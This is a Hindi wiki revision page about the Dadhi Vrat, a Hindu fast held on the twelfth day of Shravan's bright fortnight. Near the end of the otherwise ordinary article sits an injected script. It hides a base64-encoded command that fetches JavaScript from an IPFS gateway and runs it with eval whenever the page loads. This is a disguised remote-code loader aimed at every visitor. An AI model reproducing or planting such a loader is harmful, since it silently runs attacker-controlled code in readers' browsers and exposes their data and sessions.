Difference between revisions of "दधि व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - ")</ref" to "</ref")
 
Line 1: Line 1:
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
*यह व्रत [[श्रावण]] [[शुक्ल पक्ष]] की द्वादशी को होता है।<ref>निर्णयसिन्धु (111)</ref>  
+
*यह व्रत [[श्रावण]] [[शुक्ल पक्ष]] की द्वादशी को होता है।<ref>निर्णयसिन्धु (111</ref>  
 
*व्रत के दिन दही का सेवन नहीं किया जाता है।
 
*व्रत के दिन दही का सेवन नहीं किया जाता है।
 
{{प्रचार}}
 
{{प्रचार}}

Latest revision as of 12:48, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • yah vrat shravan shukl paksh ki dvadashi ko hota hai.[1]
  • vrat ke din dahi ka sevan nahian kiya jata hai.

any sanbandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. nirnayasindhu (111